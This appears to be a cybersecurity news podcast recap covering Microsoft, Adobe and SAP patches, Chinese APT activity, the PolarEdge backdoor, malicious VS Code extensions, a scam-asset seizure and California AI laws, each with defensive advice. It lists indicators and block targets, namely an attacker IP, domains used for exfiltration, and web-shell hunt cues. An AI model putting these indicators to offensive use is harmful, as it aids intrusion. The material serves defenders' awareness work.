Good Morning Security Gang!
Welcome back to the CyberHub Podcast, broadcasting to you with a double espresso in hand after a long night celebrating Simchat Torah. It’s one of the most joyous holidays on the Jewish calendar — dancing, food, bourbon (and maybe a little too much of it).
But as the holiday wrapped up, it was back to work, and what a day to return: a monster Patch Tuesday, critical vulnerabilities across Microsoft, Adobe, and SAP, major Chinese APT activity, VS Code supply chain trojans, $15 billion seized from a global scam empire, and new AI safety laws in California.
It’s a jam-packed show — let’s dive right in. ☕
🧩 Microsoft Patches 173 Vulnerabilities — 5 Critical, 2 Actively Exploited
Microsoft dropped an enormous 173 security fixes this month, including 5 critical CVEs and 2 under active exploitation — CVE-2025-24990 and CVE-2025-59230. Both involve privilege escalation and affect legacy system components and modem drivers.
I warned, “If it’s in the KEV catalog, you patch it yesterday.”
Admins should focus on kernel-level privilege escalation, especially around driver-based exploitation that can expand ransomware blast radius. Microsoft also removed a vulnerable modem driver tied to CVE-2025-24052, now under CISA’s three-week patch deadline.
Action Steps:
Prioritize KEV-listed items.
Confirm reboots post-patch.
Block unsigned driver loads.
Hunt for
dm-sysartifacts or anomalous RACM activity.
🎨 Adobe Fixes 35+ Vulnerabilities — Critical in Adobe Connect
Adobe released a massive patch set covering 35+ vulnerabilities, headlined by CVE-2025-49553, a 9.3 CVSS bug in Adobe Connect that allows remote code execution via cross-site scripting.
Other high-severity flaws affect Magento/Commerce, 3D apps, and Creative Suite tools.
As I said on the show, “Adobe patches are the gift that keep on giving — quick to install, but quicker to be exploited if ignored.”
Defenders should:
Upgrade Connect to the latest version.
Enable CSP + admin IP allowlisting.
Apply WAF rules to block known XSS patterns.
🏢 SAP Issues 16 Patches, 3 Critical CVEs
SAP patched NetWeaver, Print Service, and SRM, including three critical flaws:
CVE-2025-42944 (CVSS 10.0): Insecure deserialization in NetWeaver.
CVE-2025-42937: Directory traversal in Print Service.
CVE-2025-42910: Unauthenticated file upload in SRM.
These bugs allow arbitrary file overwrite and code execution, threatening ERP data integrity and financial compliance (SOX).
Mitigation:Patch immediately.
Remove SAP Admin UI from public access.
Add WAF rules to Print and SRM endpoints.
Hunt for serialized gadget chains or unexpected file writes in logs.
🕵️ Chinese APTs Maintain Persistence Through GIS Servers
ReliaQuest uncovered a year-long espionage campaign tied to Flax Typhoon, using ArcGIS SOE web shells to maintain stealthy persistence in municipal and utility networks. Attackers used SoftEther VPN bridges for encrypted C2 traffic over port 443 and custom Base64-encoded commands.
“These guys don’t smash and grab — they move in, unpack their bags, and stay for a year,” I said.
To defend:
Audit ArcGIS SOE configurations.
Block web shell uploads.
Rotate admin credentials.
Hunt for SoftEther auto-start entries and egress anomalies to
172.86.113.142.
🇹🇼 China Targets Taiwan with 2.8 Million Daily Intrusions
Taiwan’s intelligence service reported 2.8 million cyber intrusions per day, a 17% increase YoY, with over 10,000 fake social media accounts spreading AI-generated disinformation ahead of the 2026 elections.
This campaign mirrors China’s “Hong Kong playbook” — infiltrate, destabilize, and manipulate public sentiment. The cyber component? Continuous probing of power grids, government networks, and defense firms.
As I said bluntly: “Beijing doesn’t need a cyber Pearl Harbor — it’s already running a cyber occupation.”
🔐 PolarEdge Backdoor Exploits Routers and NAS Devices
Researchers at Sequoia Security profiled PolarEdge, a stealthy backdoor leveraging custom TLS servers and binary protocols. It targets routers and NAS devices from Cisco, ASUS, QNAP, and Synology, offering remote access, daily fingerprinting, and embedded web shell injection.
This campaign began in 2023, showing how IoT and home networks are becoming C2 infrastructure for global threat actors.
CISO takeaway: segment IoT, disable unused services, and rotate default TLS keys.
💻 Malicious VS Code Extensions Reappear — Crypto Theft Campaign
A malicious VS Code extension resurfaced on OpenVSX, masquerading as C++ Playground and Cursor/Windsurf plugins. These backdoored extensions perform source exfiltration, secret theft, and cryptocurrency mining.
The same actor, Tiger Jack, previously uploaded infected versions to the VS Code Marketplace.
Defenders should:
Pin extensions by hash.
Block openvsx.org/unpkg.com domains.
Monitor for unusual “on-text-change” triggers and outbound HTTP to
pythonanywhere.com.
💸 Feds Seize $15 Billion from Cambodian Scam Empire
In a joint operation, U.S. Treasury, UK FCDO, and Europol sanctioned and seized $15 billion in assets linked to Royal Group and Prince Holdings, run by Cambodian tycoon Keith Meng.
These networks operated slave-labor scam compounds, forcing victims into romance scams, crypto fraud, and money laundering through over 117 shell companies.
I said it loud and clear: “This isn’t a cybercrime ring — it’s modern-day slavery.”
Authorities also indicted Chinese national Chen Zai, accused of managing over ten compounds across Southeast Asia.
🧒 California Passes Age Verification and Chatbot Safety Laws
California enacted the Digital Age Assurance Act, requiring OS and app stores to age-gate devices during setup and enforce age restrictions at the app level. Violations can reach $7,500 per child.
A separate bill mandates suicide-prevention safeguards in chatbots, marking the first state-level regulation of AI conversational safety.
While I’m a free-market advocate, I said, “This is exactly what government should do — set guardrails where kids can’t protect themselves.”
🧠 James Azar’s CISO Take
This Patch Tuesday is a reminder that cyber resilience starts with fundamentals — patching, monitoring, and prioritization. But the sheer volume of vulnerabilities underscores a deeper issue: security debt. Every unpatched driver, every misconfigured app, becomes tomorrow’s exploit chain. Practitioners must think less about perfection and more about speed and visibility.
On the geopolitical side, China’s hybrid warfare and global scam syndicates show how cyber, influence, and finance are merging into one continuous threat landscape. The new California AI laws, however, offer a glimpse of balance — where technology is tempered with responsibility. For CISOs, the path forward is clear: focus on people, process, and patching — everything else is secondary.
✅ Action Items
🧩 Prioritize Microsoft CVEs 2025-24990 and 59230; confirm reboot completion.
🎨 Patch Adobe Connect (CVE-2025-49553) and Magento; enable WAF XSS filtering.
🏢 Apply SAP October notes; remove Admin UIs from public networks.
🕵️ Audit ArcGIS SOE servers; block web shell uploads and rotate credentials.
🇹🇼 Monitor for Chinese influence ops; validate social media sources.
🔐 Segment IoT; disable remote access to routers and NAS devices.
💻 Restrict third-party dev extensions; hash-verify plugins.
💸 Tighten fraud controls on SC-linked payments; educate users on scam awareness.
🧒 Review chatbot and child data compliance ahead of CA enforcement.
And that’s a wrap for today’s show, Security Gang, patch smart, stay vigilant, we’ll be back tomorrow at 9 a.m. Eastern with all the latest cybersecurity news. and as always, stay cyber safe! ☕👊
